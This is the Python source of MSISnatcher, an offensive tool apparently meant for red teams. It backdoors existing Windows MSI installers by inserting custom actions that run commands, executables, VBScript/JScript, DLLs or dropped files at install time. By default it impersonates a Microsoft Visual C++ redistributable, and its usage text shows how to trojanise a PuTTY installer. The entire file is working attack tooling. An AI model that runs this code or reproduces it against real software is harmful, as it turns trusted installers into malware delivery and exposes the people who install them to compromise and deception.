#!/usr/bin/python3
#
# Written by Mariusz Banach <mb@binary-offensive.com>, @mariuszbit / mgeeky
#

import sys
import os
import msilib
import re
import msilib.schema
import argparse
import uuid
import atexit
import random
import fnmatch
import string
import tempfile
import textwrap
import shutil
import colorama

from tempfile import mktemp

options = {
    'debug' : False,
    'verbose' : False,
}

try:
    colorama.init()
except:
    pass

class Logger:
    colors_map = {
        'red':      colorama.Fore.RED, 
        'green':    colorama.Fore.GREEN, 
        'yellow':   colorama.Fore.YELLOW,
        'blue':     colorama.Fore.BLUE, 
        'magenta':  colorama.Fore.MAGENTA, 
        'cyan':     colorama.Fore.CYAN,
        'white':    colorama.Fore.WHITE, 
        'grey':     colorama.Fore.WHITE,
        'reset':    colorama.Style.RESET_ALL,
    }

    @staticmethod
    def colorize(txt, col):
        if type(txt) is not str:
            txt = str(txt)
        if not col in Logger.colors_map.keys() or options.get('nocolor', False):
            return txt
        return Logger.colors_map[col] + txt + Logger.colors_map['reset']

    @staticmethod
    def stripColors(txt):
        ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
        result = ansi_escape.sub('', txt)
        return result

    def fatal(txt):
        Logger.text('[!] ' + txt, color='red')
        sys.exit(1)

    def info(txt):
        Logger.text('[.] ' + txt, color='yellow')

    def err(txt):
        Logger.text('[-] ' + txt, color='red')

    def ok(txt):
        Logger.text('[+] ' + txt, color='green')

    def verbose(txt):
        if options.get('verbose', False):
            Logger.text('[>] ' + txt, color='cyan')

    def dbg(txt):
        if options.get('debug', False):
            Logger.text('[dbg] ' + txt, color='magenta')

    def text(txt, color='none'):
        if color != 'none':
            txt = Logger.colorize(txt, color)

        if not options.get('quiet', False):
            print(txt)


#
# ============================================================================
# 

obscure_symbols = False
fileSequence = 0

def getRandomId(lengthFrom, lengthTo):
    if lengthTo == 0:
        if lengthFrom == 5:
            lengthFrom = 1
            lengthTo = 15
        else:
            lengthTo = lengthFrom
            lengthFrom = 1

    alphabet = string.ascii_letters

    if obscure_symbols:
        alphabet = list(set(range(1, 255)) - set(string.printable))

    return ''.join(random.choice(alphabet) for x in range(random.randint(lengthFrom, lengthTo)))

def make_id(str):
    identifier_chars = string.ascii_letters + string.digits + "._"
    str = "".join([c if c in identifier_chars else "_" for c in str])
    if str[0] in (string.digits + "."):
        str = "_" + str
    return str

class MyFeature(msilib.Feature):
    def __init__(self, db, id, title, desc, display, level = 1,
                 parent=None, directory = None, attributes=0):
        self.id = id
        if parent:
            parent = parent.id

class MyDirectory(msilib.Directory):
    # def __init__(self, db, cab, basedir, physical, _logical, default, componentflags=None):
    #     super(MyDirectory, self).__init__(db, cab, basedir, physical, _logical, default, componentflags)

    def __init__(self, db, cab, basedir, physical, _logical, default, componentflags=None):
        _logical = make_id(_logical)
        logical = _logical
        self.db = db
        self.cab = cab
        self.basedir = basedir
        self.physical = physical
        self.logical = logical
        self.component = None
        self.short_names = set()
        self.ids = set()
        self.keyfiles = {}
        self.componentflags = componentflags
        if basedir:
            self.absolute = os.path.join(basedir.absolute, physical)
            blogical = basedir.logical
        else:
            self.absolute = physical
            blogical = None
        #add_data(db, "Directory", [(logical, blogical, default)])

    def add_file(self, file, src=None, version=None, language=None):
        global fileSequence
        if not self.component:
            self.start_component(self.logical, msilib.current_feature, 0)
        if not src:
            src = file
            file = os.path.basename(file)
        absolute = os.path.join(self.absolute, src)
        assert not re.search(r'[\?|><:/*]"', file) # restrictions on long names
        if file in self.keyfiles:
            logical = self.keyfiles[file]
        else:
            logical = None
        sequence, logical = self.cab.append(absolute, file, logical)
        assert logical not in self.ids
        self.ids.add(logical)
        short = self.make_short(file)
        full = "%s|%s" % (short, file)
        filesize = os.stat(absolute).st_size
        attributes = 512
        fileSequence += 1
        msilib.add_data(self.db, "File",
                        [(logical, self.component, full, filesize, version,
                         language, attributes, fileSequence)])
        return logical

    def glob(self, pattern, exclude = None):
        try:
            files = os.listdir(self.absolute)
        except OSError:
            return []
        if pattern[:1] != '.':
            files = (f for f in files if f[0] != '.')
        files = fnmatch.filter(files, pattern)
        for f in files:
            if exclude and f in exclude: continue
            self.add_file(f)
        return files


class MSISnatcher:

    #
    # https://learn.microsoft.com/pl-pl/windows/win32/msi/custom-action-return-processing-options?redirectedfrom=MSDN
    # https://learn.microsoft.com/en-us/windows/win32/msi/custom-action-execution-scheduling-options
    # https://learn.microsoft.com/en-us/windows/win32/msi/custom-action-in-script-execution-options
    # https://learn.microsoft.com/en-us/windows/win32/msi/summary-list-of-all-custom-action-types
    #

    CustomActionTypes = {
        'execute' : 1250,  # deferred, impersonate
        #'execute' : 3298,   # deferred, no impersonate
        #'execute' : 226,   # immediate, impersonate
        'vbscript' : 1126,
        'vbscript-backdoor' : 70,
        #'vbscript' : 102,
        'jscript' : 1125,
        'jscript-backdoor' : 69,
        #'jscript' : 101,
        'run-exe' : 1218,
        #'run-exe' : 194,
        'dotnet' : 65, 
        'run-dll' : 65,
        'run-dropped-file' : 1746,
        'set-directory' : 51,
    }

    DefaultCustomActionCondition    = 'NOT REMOVE'
    DefaultCustomActionSource       = 'INSTALLDIR'

    defaults = {
        'name' : 'Microsoft Visual C++ 2013 Redistributable (64)',
        'manufacturer' : 'Microsoft Corporation',
        'app_version' : '12.0.0.0',
        'guid' : str(uuid.uuid4()).upper(),
    }

    def __init__(self, options):
        self.options = options
        self.dbobject = None
        self.availableSequenceNumbers = list()
        self.availableCostInitializeSequenceNumbers = list()
        self.availableSequenceNumbersDirectory = list()

        self.param1 = ''
        self.param2 = ''
        self.param3 = ''
        self.param4 = ''
        self.param5 = ''

        self.recordsToAdd = {}

    def open(self, outfile):
        self.outfile = outfile
        #Logger.info('Backdooring existing MSI database...')

        self.dbobject = msilib.OpenDatabase(
            self.outfile, 
            msilib.MSIDBOPEN_TRANSACT
        )

        self.availableSequenceNumbers = self.collectAvailableSequenceNumbers(
            'InstallExecuteSequence',
            'InstallInitialize',
            'InstallFinalize',
        )

        self.availableCostInitializeSequenceNumbers = self.collectAvailableSequenceNumbers(
            'InstallExecuteSequence',
            'CostInitialize',
            'FileCost',
        )

    def close(self, commit=True):
        if self.dbobject is not None:
            if commit:
                self.dbobject.Commit()
            self.dbobject.Close()
            self.dbobject = None

    @staticmethod
    def getRandomString(lengthFrom=5, lengthTo=0):
        if lengthTo == 0:
            if lengthFrom == 5:
                lengthFrom = 1
                lengthTo = 15
            else:
                lengthTo = lengthFrom
                lengthFrom = 1

        return ''.join(random.choice(string.ascii_letters) for x in range(random.randint(lengthFrom, lengthTo)))

    def generate(self, attack, outfile):
        try:
            ret = self.generateWorker(attack, outfile)
            return ret

        except Exception as e:
            if os.path.isfile(outfile):
                if self.dbobject is not None:
                    self.dbobject.Close()
                    self.dbobject = None

                os.remove(outfile)
                Logger.dbg('Had to remove faulty output database.')

            if self.options['debug']: 
                raise
            else:
                Logger.err(f'Could not produce output MSI. Enable --debug to learn more. Exception: {e}')

            return False

        finally:
            if self.dbobject is not None:
                self.dbobject.Commit()
                self.dbobject.Close()
                self.dbobject = None

                Logger.dbg('Commited database and cleanly closed it.')

    def generateWorker(self, attack, outfile):
        attackNode = None

        self.attack = attack
        self.outfile = outfile
        self.backdoorMode = False
        
        self.param1 = self.options.get('param1', '')
        self.param2 = self.options.get('param2', '')
        self.param3 = self.options.get('param3', '')
        self.param4 = self.options.get('param4', '')
        self.param5 = self.options.get('param5', '')

        for k, v in MSISnatcher.SupportedMSIAttacks.items():
            if k.lower() == attack:
                attackNode = v
                break

        if not attackNode:
            Logger.fatal(f'Could not find specified attack named: "{attack}"')

        try:
            ret = attackNode['handler'](self)
        
        except KeyboardInterrupt:
            Logger.fatal('User interrupted MSI generation!\n')

        self.insertRecords()

        return os.path.isfile(outfile)

    def insertRecords(self):
        assert self.dbobject is not None, "Database is not opened"
        count = 0

        for k, v in self.recordsToAdd.items():
            s = ''
            n = 0
            for a in v:
                s += f'\nRECORD ({n})\n'
                n += 1

                if k == 'InstallExecuteSequence':
                    s += f'''
    Action    = {a[0]}
    Condition = {a[1]}
    Sequence  = {a[2]}
'''

                elif k == 'Binary':
                    s += f'''
    Name    = {a[0]}
    Data    = binary data fetched from: "{a[1]}"
'''
                elif k == 'CustomAction':
                    c = ''
                    if len(a[3]) > 512:
                        c = '...'

                    s += f'''
    ID           = {a[0]}
    Type         = {a[1]}
    Source       = {a[2]}
    Target       = {a[3][:512]} {c}
    ExtendedType = {a[4]}
'''
                elif k == 'Component':
                    s += f'''
    Component   = {a[0]}
    ComponentId = {a[1]}
    Directory   = {a[2]}
    Attributes  = {a[3]}
    Condition   = {a[4]}
    KeyPath     = {a[5]}
'''
                elif k == 'File':
                    s += f'''
    File       = {a[0]}
    Component  = {a[1]}
    FileName   = {a[2]}
    FileSize   = {a[3]}
    Version    = {a[4]}
    Language   = {a[5]}
    Attributes = {a[6]}
    Sequence   = {a[7]}
'''
                elif k == 'Registry':
                    s += f'''
    Registry  = {a[0]}
    Root      = {a[1]}
    Key       = {a[2]}
    Name      = {a[3]}
    Value     = {a[4]}
    Component = {a[5]}
'''
                elif k == 'Directory':
                    s += f'''
    Directory        = {a[0]}
    Directory_Parent = {a[1]}
    DefaultDir       = {a[2]}
'''
                else:
                    for b in a:
                        s += f'\t{b}\n'

            g = ''
            if len(v) > 0: g = 's'

            Logger.info(f'Adding {len(v)} record{g} to {k} table...')
            Logger.dbg(s.lstrip())

            if k == 'Binary':
                newv = []

                for i in range(len(v)):
                    n = [
                        v[i][0],
                        msilib.Binary(v[i][1])
                    ]
                    newv.append(n)
                v = newv

            try:
                msilib.add_data(self.dbobject, k, v)
            except AssertionError:
                if k == 'CustomAction':
                    vnew = []
                    for a in v:
                        vnew.append(a[:-1])

                    msilib.add_data(self.dbobject, k, vnew)
                else:
                    raise

            count += 1

        Logger.text(f'[+] Inserted {count} backdoor table entries.')

    def collectEntries(self, table, dontSort = False):
        assert self.dbobject is not None, "Database is not opened"
        entries = []

        view = self.dbobject.OpenView(f"SELECT * FROM {table}")
        view.Execute(None)

        count = view.GetColumnInfo(msilib.MSICOLINFO_TYPES)
        types = []

        for i in range(1, count.GetFieldCount()+1):
            t = count.GetString(i)

            if t.startswith('l') or t.startswith('S') or t.startswith('s') or t.startswith('L'):
                types.append('str')
            elif t.startswith('i') or t.startswith('I'):
                types.append('int')
            else:
                Logger.dbg(f'Unsupported column type: table {table}, column: {i}. Type: {t}')
                types.append('?')


        while True:
            r = view.Fetch() 
            if not r:
                break

            rec = []

            for i in range(1, count.GetFieldCount()+1):
                val = None

                if types[i-1] == 'str': 
                    val = r.GetString(i)
                elif types[i-1] == 'int': 
                    val = r.GetInteger(i)
                
                rec.append(val)

            entries.append(rec)

        view.Close()

        tablesSortedColumn = {
            'InstallExecuteSequence' : 2,
            'InstallUISequence' : 2,
            'File' : 7,
            'Feature' : 4,
            'Media' : 0,
        }

        if not dontSort and table in tablesSortedColumn:
            entries = sorted(entries, key=lambda x: x[tablesSortedColumn[table]])

        Logger.dbg(f'Collected {len(entries)} entries from {table} ...')
        return entries

    def collectAvailableSequenceNumbers(self, table, fromStr, toStr):
        entries = self.collectEntries(table)

        fromNum = -1
        toNum = -1
        sequenceNumbers = set()
        availableSequenceNumbers = []

        for entry in entries:
            action = entry[0]
            sequence = entry[2]

            if action.lower() == toStr.lower():
                toNum = int(sequence)

            elif action.lower() == fromStr.lower():
                fromNum = int(sequence)

            sequenceNumbers.add(sequence)

        takenNumbers = set()

        num = toNum - 1
        while num > fromNum:
            if num in takenNumbers:
                num -= 1
                continue

            availableSequenceNumbers.append(num)
            num -= 1

        availableSequenceNumbers.reverse()
        return availableSequenceNumbers

    def addRecords(self, table, record):
        if table not in self.recordsToAdd:
            self.recordsToAdd[table] = []

        self.recordsToAdd[table].append(tuple(record))

    def addCustomAction(self, caId, actionType, source, target, condition = DefaultCustomActionCondition):
        ca = [
            caId,       # Action
            actionType, # Type
            source,     # Source
            target,     # Target
            '',         # ExtendedType
        ]
        execSeq = [
            caId,                                # Action
            condition,                           # Condition
            self.availableSequenceNumbers.pop(0) # Sequence
        ]

        self.addRecords('CustomAction', ca)
        self.addRecords('InstallExecuteSequence', execSeq)

    def addBinary(self, binaryKey, filePath):
        self.addRecords('Binary', (binaryKey, filePath))

    def onExecute(self):
        caId = MSISnatcher.getRandomString(6, 12)

        if len(self.param1) == 0:
            Logger.fatal('You need to specify -1/--param1 for "execute" attack!')

        self.addCustomAction(
            caId,
            MSISnatcher.CustomActionTypes['execute'],
            MSISnatcher.DefaultCustomActionSource,
            self.param1
        )

        return True

    def addNewCAB(self, cab, diskId, lastSequence = 0):
        if lastSequence == 0:
            lastSequence = cab.index

        filename = mktemp()
        tempDir = os.path.dirname(filename)
        msilib.FCICreate(filename, cab.files)
        msilib.add_data(self.dbobject, "Media", [(diskId, lastSequence, None, "#"+cab.name, None, None)])

        try:
            Logger.info('Streaming CAB component into MSI database...')
            msilib.add_stream(self.dbobject, cab.name, filename)
        
        except Exception as e:
            Logger.fatal(f'Could not add a new stream into _Streams table! Exception: {e}')

        os.unlink(filename)
        self.dbobject.Commit()
        Logger.text('[.] Inserted a new CAB stream with input files into backdoored MSI :-)')

    def addFileToMSI(self, path, outputDir = DefaultCustomActionSource, cabName = ''):
        global fileSequence

        if len(cabName) == 0:
            cabName = MSISnatcher.getRandomString(5, 15)  
        
        componentName = MSISnatcher.getRandomString(5, 15)  

        num = 0
        try:
            cab = msilib.CAB(cabName)
            Logger.info('Looking for which MSI Feature to backdoor...')

            features = self.collectEntries('Feature')
            medias = self.collectEntries('Media')
            files = self.collectEntries('File')
            featureComponents = self.collectEntries('FeatureComponents')
            directories = self.collectEntries('Directory')
            components = self.collectEntries('Component')
            featureFound = 0

            feature = None
            dirName = None
            fileSequence = maxSequence = files[-1][-1]

            if len(files) > 0:
                component = componentName = files[0][1]
                componentName += '1'
                for featComp in featureComponents:
                    if feature is not None: break
                    if featComp[1] == component:
                        for feat in features:
                            if feat[0] == featComp[0]:
                                feature = MyFeature(
                                    self.dbobject,
                                    id = feat[0],
                                    parent = feat[1],
                                    title = feat[2],
                                    desc = feat[3],
                                    display = feat[4],
                                    level = feat[5],
                                    directory = feat[6],
                                    attributes = feat[7]
                                )

                                Logger.dbg(f'Snatching existing Feature: {feat[0]}')

                                for c in components:
                                    if c[0] == component:
                                        dirName = c[2]
                                        Logger.dbg(f'Snatching existing Directory {dirName} from Component {component}')
                                        break
                                break

            if feature is None:
                fid = getRandomId(5, 15)
                Logger.info(f'Will create a new Feature: {fid}')
                feature = msilib.Feature(
                    db = self.dbobject,
                    id = fid,
                    parent = '',
                    title = '',
                    desc = '',
                    display = 0,
                    level = features[-1][5] + 1,
                    attributes = 0
                )

            feature.set_current()
            Logger.info(f'Adding files to Feature "{feature.id}" and Directory "{dirName}"')

            if dirName is None:
                dirName = componentName

            physical = path
            if os.path.isfile(path):
                physical = os.path.dirname(path)

            dirExist = False
            dirn = None

            for dirb in directories:
                if dirb[0] == dirName:
                    dirExist = True

                    Logger.info(f'Will reuse directory {outputDir}')
                    dirn = MyDirectory(
                        self.dbobject, 
                        cab, 
                        None, 
                        physical, 
                        dirName, 
                        'SourceDir'
                    )
                    break

            if not dirExist:
                Logger.info(f'Will create a new directory {outputDir}')
                dirn = MyDirectory(
                    self.dbobject, 
                    cab, 
                    None, 
                    physical, 
                    dirName, 
                    'SourceDir'
                )

            Logger.text('[+] Adding files into a new CAB component...')
            
            if os.path.isfile(path):
                dirn.add_file(os.path.basename(path))
            else:
                dirn.glob('**/**')

            rootdir = os.path.abspath(os.path.dirname(path))

            diskId = medias[-1][0] + 1
            Logger.info(f'Backdoored MSI will contain a new {diskId}. CAB named "{cabName}" .')
            
            self.addNewCAB(cab, diskId, fileSequence)
        
        except Exception as e:
            if self.options.get('debug', False):
                raise

            Logger.fatal(f'Could not add file to MSI (via new CAB method): {e}')

    def addBinary(self, binaryKey, filePath):
        self.addRecords('Binary', (binaryKey, filePath))

    def onRunExe(self):
        if len(self.param1) == 0:
            Logger.fatal('This attack requires --param1 to point to EXE file to become loaded by MSI installer.')

        if not self.param1.lower().endswith('.exe'):
            Logger.fatal('This attack requires --param1 to specify path to .EXE file to be launched! Make sure it ends with .exe')

        self.param1 = os.path.abspath(os.path.normpath(self.param1))

        caId = MSISnatcher.getRandomString(6, 12)
        binaryKey = MSISnatcher.getRandomString(6, 12)

        self.addBinary(binaryKey, self.param1)

        self.addCustomAction(
            caId,
            MSISnatcher.CustomActionTypes['run-exe'],
            binaryKey,
            ''
        )

    def onScript(self):
        if len(self.param1) == 0:
            Logger.fatal('This attack requires --param1 to point to VBScript/JScript file to be run by MSI installer.')

        self.param1 = os.path.abspath(os.path.normpath(self.param1))

        if not (self.param1.lower().endswith('.vbs') or self.param1.lower().endswith('.js') or self.param1.lower().endswith('.jse') or self.param1.lower().endswith('.vbe')):
            Logger.fatal('--param1 must point to VBScript/JScript script file! Make sure extension checks out (.vbs, .js).')

        if len(self.param2) == 0:
            Logger.fatal('This attack requires --param2 specifying name of the function defined in input script to be invoked during installation.')

        scriptContents = ''
        with open(self.param1, 'rb') as f:
            scriptContents = f.read()

        if self.param1.lower().endswith('.jse') or self.param1.lower().endswith('.vbe'):
            msg = 'Encoded VBScript/JScript (.vbe/.jse) are not supported by MSI format!'

            if not all(c in string.printable for c in scriptContents):
                Logger.fatal(msg)
            else:
                Logger.err('WARNING! ' + msg)

        scriptType = 'vbscript'
        scriptFunc = self.param2
        
        if scriptFunc.encode() not in scriptContents:
            Logger.fatal(f'Could not find function named --param2 "{scriptFunc}" in input script! Make sure that you specified its name properly.')

        if self.param1.lower().endswith('.js') or self.param1.lower().endswith('.jse'):
            scriptType = 'jscript'

        caId = MSISnatcher.getRandomString(6, 12)
        binaryKey = MSISnatcher.getRandomString(6, 12)

        self.addBinary(binaryKey, self.param1)

        typeName = scriptType.lower() + '-backdoor'

        self.addCustomAction(
            caId,
            MSISnatcher.CustomActionTypes[typeName],
            binaryKey,
            scriptFunc
        )

    def onFileDropper(self):
        if len(self.param1) == 0:
            Logger.fatal('This attack requires --param1 to point to file(s)/directory to bundle into MSI installer.')

        self.param1 = os.path.abspath(os.path.normpath(self.param1))

        targetDir = MSISnatcher.DefaultCustomActionSource

        if len(self.param4) > 0:
            targetDir = os.path.abspath(os.path.normpath(self.param4))

        if len(self.param2) == 0 and os.path.isfile(self.param1):
            self.param2 = os.path.basename(self.param1)

        try:
            streams = self.collectEntries('_Streams')
            Logger.text(f'[+] This MSI is eligible for inserting new files (run-file backdoor attack).', color='green')

        except Exception as e:
            #raise
            Logger.fatal(f'''
==============================================================================
Missing _Streams table!

Sorry but currently RMF cannot backdoor this MSI file with run-file attack.

Some MSI files contain mangled OLE streams and seemingly miss essential _Streams table.
It was supposed to collect all bundled CABinet files, however since its lacking we're unable to
insert a new CABinet (or even updated one, since its size increased) back into MSI.

Try backdooring different .MSI or changing your attack for instance into: 

py msi-snatcher.py dotnet -i legit.msi -1 shellcode.bin evil.msi

==============================================================================
''')

        self.addFileToMSI(
            self.param1,
            targetDir,
        )

        caId = MSISnatcher.getRandomString(6, 12)
        files = self.collectEntries('File')
        fileId = ''

        for f in files:
            if f[0].lower() == self.param2.lower():
                fileId = f[0]
            elif f[0].lower() == os.path.basename(self.param2).lower():
                fileId = f[0]

        if fileId == '':
            Logger.fatal(f'Could not determine FileID of just inserted file! Cannot continue.')
        
        self.addCustomAction(
            caId,
            MSISnatcher.CustomActionTypes['run-dropped-file'],
            fileId,
            '',
        )

    def onDllEntry(self):
        if len(self.param1) == 0:
            Logger.fatal('This attack requires --param1 to point to DLL file to become loaded by MSI installer.')

        if len(self.param2) == 0:
            Logger.fatal('This attack requires --param2 specifying DLL\'s Export name to call during installation.')

        caId = MSISnatcher.getRandomString(6, 12)
        binaryKey = MSISnatcher.getRandomString(6, 12)

        self.addBinary(
            binaryKey,
            self.param1
        )
        self.addCustomAction(
            caId,
            MSISnatcher.CustomActionTypes['run-dll'],
            binaryKey,
            self.param2
        )

    SupportedMSIAttacks = {
        'drop-files' : {
            'description' : 'Save file(s) to system with option to run them after install.',
            'parameters' : (
                'Path to file(s)/directory to be bundled into MSI and later dropped onto infected system.',
                '(optional) Run file #1 after installation. If neither --param2 nor --param4 are used, MSI will run file from --param1 ',
                '(optional) Command line parameters for file #1',
                '(optional) Target directory where to drop file. Can be: --param4 "C:\\Users\\Public" or --param4 "%LOCALAPPDATA%" or --param4 TARGETDIR (default)',
            ),
            'handler' : onFileDropper
        },
        'execute' : {
            'description' : 'Run specified system command(s).',
            'parameters' : (
                'Command #1 to run',
            ),
            'handler' : onExecute
        },

        'script' : {
            'description' : 'Run VBScript/JScript inside of msiexec.exe right after installation via CustomAction.',
            'parameters' : (
                'Path to VBscript/JScript file to execute',
                'Function name defined in script to be invoked.',
            ),
            'handler' : onScript
        },
        'run-exe' : {
            'description' : 'Run Executable that will be extracted to C:\\Windows\\Installer\\RANDOM.tmp and run by services.exe -> msiexec.exe ',
            'parameters' : (
                'Path to executable to launched.',
                '(optional) Command line parameters for executable',
            ),
            'handler' : onRunExe
        },

        'load-dll' : {
            'description' : 'Loads DLL into msiexec.exe during install via CustomAction DllEntry.',
            'parameters' : (
                'Path to DLL file to load',
                'DLL Export function name',
            ),
            'handler' : onDllEntry
        },

        'dotnet' : {
            'description' : 'Loads .NET DLL into msiexec.exe during install via CustomAction DllEntry (its the same action as load-dll).',
            'parameters' : (
                'Path to DLL file to load',
                'DLL Export (adnotated) function name',
            ),
            'handler' : onDllEntry
        },
    }

def getoptions():
    global options

    attacks = ''
    num = 0

    for attackName, attackNode in MSISnatcher.SupportedMSIAttacks.items():
        num += 1
        desc = attackNode['description']

        attacks += f"  {num:2d}. {Logger.colorize(attackName, 'green'):20s}\n\n"
        attacks += textwrap.indent(desc.strip(), '\t') + '\n\n'

        if 'parameters' in attackNode.keys() and len(attackNode['parameters']) > 0:
            attacks += '\n\tAttack Parameters:\n'
            pnum = 1
            for par in attackNode['parameters']:
                attacks += f'\t\t{Logger.colorize(f"--param{pnum}","yellow")} - {par}\n'
                pnum += 1
            attacks += '\n'

    epilog = f'''

=====================================================

Supported MSI attacks:

{attacks}

=====================================================

'''

    usage = '\nUsage: msi-snatcher.py [options] <attack> <outfile.msi> [params]\n'
    opts = argparse.ArgumentParser(
        usage=usage,
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent(epilog)
    )

    attacks = [x.lower() for x in MSISnatcher.SupportedMSIAttacks]

    req = opts.add_argument_group('Required arguments')
    req.add_argument('attack', default='', help='Specifies MSI attack action to inject. Supported attacks: ' + ', '.join(attacks))
    req.add_argument('outfile', help='Output produced/backdoored MSI file.')
    
    opt = opts.add_argument_group('Options')
    opt.add_argument('-i', '--infile', default='', type=str, help='Backdoors input MSI file and saves it to <outfile>')
    opt.add_argument('-v', '--verbose', default=False, action='store_true', help='Verbose mode.')
    opt.add_argument('-d', '--debug', default=False, action='store_true', help='Debug mode.')

    var = opts.add_argument_group('Attack Parameters')
    var.add_argument('-1', '--param1', default='', help=f'Attack specific #1 parameter')
    var.add_argument('-2', '--param2', default='', help=f'Attack specific #2 parameter')
    var.add_argument('-3', '--param3', default='', help=f'Attack specific #3 parameter')
    var.add_argument('-4', '--param4', default='', help=f'Attack specific #4 parameter')
    var.add_argument('-5', '--param5', default='', help=f'Attack specific #5 parameter')

    props = opts.add_argument_group('Properties used when creating a new MSI')
    props.add_argument('-n', '--name', metavar='NAME', default=MSISnatcher.defaults['name'], help=f'Specifies application name. Default: "Microsoft Visual C++ 2013 Redistributable (64) - 12.0.RANDOM"')
    props.add_argument('-V', '--app-version', metavar='VER', default=MSISnatcher.defaults['app_version'], help=f'Specifies product version. Default: "12.0.0.0"')
    props.add_argument('-g', '--guid', default=MSISnatcher.defaults['guid'], help=f'Specifies application GUID. Default: random')
    props.add_argument('-m', '--manufacturer', metavar='VENDOR', default=MSISnatcher.defaults['manufacturer'], help=f'Specifies application manufacturer/vendor/company. Default: "Microsoft Corporation"')

    args = opts.parse_args()

    args.outfile = os.path.abspath(os.path.normpath(args.outfile))

    if len(args.infile) > 0:
        args.infile = os.path.abspath(os.path.normpath(args.infile))

        if not os.path.isdir(os.path.dirname(args.infile)):
            Logger.fatal(f'Directory pointed by --infile does not exist!')
        if not os.path.isfile(args.infile):
            Logger.fatal(f'--infile does not exist!')

    dirname = os.path.dirname(args.outfile)
    if not os.path.isdir(dirname):
        Logger.fatal(f'Directory pointed in --outfile does not exist: {dirname}')

    options.update(vars(args))
    return args

def banner():
    return f'''
    :: MSISnatcher - Your MSI backdooring companion
    A script that backdoors input MSI installers with malicious records intended to run code
    during install. To be used by legitimate Red Teams.

    Mariusz Banach / mgeeky '22-23, <mb@binary-offensive.com>
'''

def main():
    args = getoptions()
    if not args:
        return False

    Logger.text(banner())

    if len(args.infile) == 0:
        Logger.fatal(f'''New database creation is not yet supported!

    Currently this script can only backdoor existing MSI databases. 

    Run it like so:

        cmd> py msi-snatcher.py -i <backdoor.msi> <attack> [params] <output.msi>

    Example:

        cmd> py msi-snatcher.py -i putty-0.67-installer.msi execute -1 calc putty-backdoored.msi

''')
    
    msir = MSISnatcher(options)

    if os.path.isfile(args.outfile):
        os.remove(args.outfile)

    shutil.copy(args.infile, args.outfile)

    msir.open(args.outfile)
    result = msir.generate(args.attack, args.outfile)
    
    msir.close()
    
    if not result:
        w = 'generate'
        if len(args.infile) > 0:
            w = 'backdoor'

        Logger.text(f"\n[-] Could not {w} MSI {args.attack} installer!")
        
    else:

        if args.outfile.lower().endswith('.msi'):
            Logger.text(f'''-------------------------------------------------------------------------

[1] To {Logger.colorize(f"INSTALL", "cyan")} your MSI use one of the following methods:

    (1) Simply double-click on it

    (2) Install quietly from command line:
        cmd> {Logger.colorize(f"{args.outfile} /q", "green")}

    (3) Install through COM (here's VBScript):

        With CreateObject("WindowsInstaller.Installer")
            .UILevel = 2
            .InstallProduct("{args.outfile}")
        End With


[2] To {Logger.colorize(f"UNINSTALL", "cyan")} your MSI, follow:

    (1) Uninstall quietly from command line:
        cmd> {Logger.colorize(f"msiexec /q /x {args.outfile}", "green")}

    (2) Uninstall through COM (here's VBScript):

        With CreateObject("WindowsInstaller.Installer")
            .UILevel = 2
            .InstallProduct "{args.outfile}", "REMOVE=ALL"
        End With

-------------------------------------------------------------------------''')


        w = 'Created a new MSI'
        if len(args.infile) > 0:
            w = 'Input MSI backdoored'
            
        Logger.text(f"\n[+] {w} with {args.attack} attack.")


@atexit.register
def goodbye():
    try:
        colorama.deinit()
    except:
        pass

if __name__ == '__main__':
    main()
